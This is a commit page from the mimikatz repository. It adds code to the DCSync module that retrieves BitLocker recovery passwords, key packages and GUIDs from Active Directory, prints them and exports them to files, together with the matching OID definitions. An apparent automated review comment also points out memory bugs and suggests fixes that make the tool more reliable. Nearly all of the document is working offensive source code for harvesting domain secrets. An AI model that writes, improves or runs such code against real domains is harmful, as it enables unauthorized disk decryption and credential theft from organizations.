
Commit 17669a9

authored
Merge pull request #371 from matrix/dcsync_bitlocker
Dump ms-FVE-RecoveryInformation objects (BitLocker recovery information: recovery GUID, volume GUID, recovery password and key package) with DCSync
2 parents 57bad57 + 0581c93 commit 17669a9


3 files changed

+91
-1
lines changed


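--- a/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c
+++ b/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c
@@ -16,6 +16,7 @@ LPCSTR kuhl_m_lsadump_dcsync_oids[] = {
 szOID_ANSI_userAccountControl, szOID_ANSI_accountExpires, szOID_ANSI_pwdLastSet,
 szOID_ANSI_objectSid, szOID_ANSI_sIDHistory,
 szOID_ANSI_unicodePwd, szOID_ANSI_ntPwdHistory, szOID_ANSI_dBCSPwd, szOID_ANSI_lmPwdHistory, szOID_ANSI_supplementalCredentials,
+szOID_ANSI_msFVEKeyPackage, szOID_ANSI_msFVERecoveryGuid, szOID_ANSI_msFVEVolumeGuid, szOID_ANSI_msFVERecoveryPassword,
 szOID_ANSI_trustPartner, szOID_ANSI_trustAuthIncoming, szOID_ANSI_trustAuthOutgoing,
 szOID_ANSI_currentValue,
 szOID_isDeleted,
@@ -25,6 +26,8 @@ LPCSTR kuhl_m_lsadump_dcsync_oids_export[] = {
 szOID_ANSI_sAMAccountName, szOID_ANSI_objectSid,
 szOID_ANSI_userAccountControl,
 szOID_ANSI_unicodePwd,
+szOID_ANSI_msFVEKeyPackage, szOID_ANSI_msFVERecoveryGuid, szOID_ANSI_msFVEVolumeGuid, szOID_ANSI_msFVERecoveryPassword,
+szOID_ANSI_currentValue,
 szOID_isDeleted,
 };
 NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
@@ -236,9 +239,12 @@ void kuhl_m_lsadump_dcsync_descrObject_csv(SCHEMA_PREFIX_TABLE *prefixTable, ATT
 void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport)
 {
 kull_m_rpc_drsr_findPrintMonoAttr(L"\nObject RDN : ", prefixTable, attributes, szOID_ANSI_name, TRUE);
+
 kprintf(L"\n");
 if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_sAMAccountName, NULL, NULL))
 kuhl_m_lsadump_dcsync_descrUser(prefixTable, attributes);
+else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, NULL, NULL))
+kuhl_m_lsadump_dcsync_descrBitlocker(prefixTable, attributes, someExport);
 else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_trustPartner, NULL, NULL))
 kuhl_m_lsadump_dcsync_descrTrust(prefixTable, attributes, szSrcDomain);
 else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_currentValue, NULL, NULL))
@@ -292,6 +298,82 @@ LPCWSTR kuhl_m_lsadump_samAccountType_toString(DWORD accountType)
 return target;
 }
 
+void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes, BOOL someExport)
+{
+UNICODE_STRING recoveryGuid, uString;
+wchar_t* shortname = NULL;
+DWORD szData = 0;
+PVOID data = 0;
+
+recoveryGuid.Length = 0;
+
+kprintf(L"** BITLOCKER RECOVERY INFORMATION **\n\n");
+
+if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVEVolumeGuid, &data, NULL))
+{
+if(NT_SUCCESS(RtlStringFromGUID(data, &uString)))
+{
+kprintf(L"Volume GUID : %wZ\n", &uString);
+RtlFreeUnicodeString(&uString);
+}
+}
+
+if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, &data, NULL))
+{
+if(NT_SUCCESS(RtlStringFromGUID(data, &recoveryGuid)))
+{
+kprintf(L"Recovery GUID : %wZ\n", &recoveryGuid);
+}
+}
+
+if(someExport)
+{
+if(recoveryGuid.Length <= 0)
+{
+recoveryGuid.Buffer = kull_m_string_getRandomGUID();
+recoveryGuid.Length = (USHORT)wcslen(recoveryGuid.Buffer);
+kprintf(L"Recovery GUID (fake) : %wZ\n", &recoveryGuid);
+}
+shortname = recoveryGuid.Buffer;
+}
+
+if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryPassword, &data, &szData))
+{
+if(szData > 0)
+{
+kprintf(L"Recovery Password : %s\n", data);
+
+if(someExport)
+{
+PWCHAR filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, shortname, L"recoveryPassword");
+kprintf(L"\tExport : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
+LocalFree(filename);
+}
+}
+}
+
+if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVEKeyPackage, &data, &szData))
+{
+if(szData > 0)
+{
+kprintf(L"Key Package Size : %u byte(s)\n", szData);
+kprintf(L"Key Package : [");
+kull_m_string_wprintf_hex(data, szData, 0);
+kprintf(L"]\n");
+
+if (someExport)
+{
+PWCHAR filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, shortname, L"keyPackage");
+kprintf(L"\tExport : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
+LocalFree(filename);
+}
+}
+}
+
+if (recoveryGuid.Length > 0)
+RtlFreeUnicodeString(&recoveryGuid);
+}
+
 void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes)
 {
 DWORD rid = 0, i;
@@ -3046,4 +3128,4 @@ ULONG SRV_IDL_DRSVerifyNames(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_VERIFYR
 ULONG SRV_IDL_DRSUpdateRefs(DRS_HANDLE hDrs, DWORD dwVersion, DRS_MSG_UPDREFS *pmsgUpdRefs)
 {
 return STATUS_SUCCESS;
-}
+}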
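Review bot: `recoveryGuid.Length = (USHORT)wcslen(recoveryGuid.Buffer);` in the fake-GUID branch of kuhl_m_lsadump_dcsync_descrBitlocker stores a character count, but UNICODE_STRING.Length is a byte count, so `%wZ` prints only the first half of the generated GUID and MaximumLength is left uninitialized; `recoveryGuid.Length = (USHORT)(wcslen(recoveryGuid.Buffer) * sizeof(wchar_t));` followed by `recoveryGuid.MaximumLength = recoveryGuid.Length + sizeof(wchar_t);` fixes both. That same buffer is later released with `RtlFreeUnicodeString`, which is only correct if kull_m_string_getRandomGUID allocates it the way RtlStringFromGUID does (process heap); the helper is not in the hunk, so this is worth confirming, and `shortname` aliases the buffer until the end of the function so it must not be freed any earlier. Separately, `kprintf(L"Recovery Password : %s\n", data);` prints the raw attribute value with an unbounded `%s` even though the helper hands back its byte length in szData; if the DRSR value is not NUL-terminated this reads past the buffer, whereas `kprintf(L"Recovery Password : %.*s\n", szData / sizeof(wchar_t), (PWSTR) data);` is bounded like the file export on the next lines. The function is complete within this hunk.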

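--- a/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.h
+++ b/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.h
@@ -12,6 +12,7 @@
 #include "../modules/rpc/kull_m_rpc_drsr.h"
 #include "../kuhl_m.h"
 #include "../kuhl_m_lsadump.h" // to move
+#include "../modules/kull_m_string.h"
 
 NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_lsadump_dcshadow(int argc, wchar_t * argv[]);
@@ -46,6 +47,7 @@ void kuhl_m_lsadump_dcsync_descrUserProperties(PUSER_PROPERTIES properties);
 void kuhl_m_lsadump_dcsync_descrTrust(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain);
 void kuhl_m_lsadump_dcsync_descrTrustAuthentication(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, PCUNICODE_STRING domain, PCUNICODE_STRING partner, BOOL isIn);
 void kuhl_m_lsadump_dcsync_descrSecret(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, BOOL someExport);
+void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes, BOOL someExport);
 void kuhl_m_lsadump_dcsync_descrObject_csv(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, BOOL withDeleted, BOOL decodeUAC);
 
 typedef BOOL (*DCSHADOW_SYNTAX_ENCODER) (ATTRVAL* pVal, PWSTR szValue);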

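--- a/modules/rpc/kull_m_rpc_drsr.h
+++ b/modules/rpc/kull_m_rpc_drsr.h
@@ -188,6 +188,12 @@ typedef enum {
 #define szOID_ANSI_lmPwdHistory "1.2.840.113556.1.4.160"
 #define szOID_ANSI_supplementalCredentials "1.2.840.113556.1.4.125"
 
+// bitlocker
+#define szOID_ANSI_msFVERecoveryPassword "1.2.840.113556.1.4.1964"
+#define szOID_ANSI_msFVERecoveryGuid "1.2.840.113556.1.4.1965"
+#define szOID_ANSI_msFVEVolumeGuid "1.2.840.113556.1.4.1998"
+#define szOID_ANSI_msFVEKeyPackage "1.2.840.113556.1.4.1999"
+
 #define szOID_ANSI_trustPartner "1.2.840.113556.1.4.133"
 #define szOID_ANSI_trustAuthIncoming "1.2.840.113556.1.4.129"
 #define szOID_ANSI_trustAuthOutgoing "1.2.840.113556.1.4.135"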
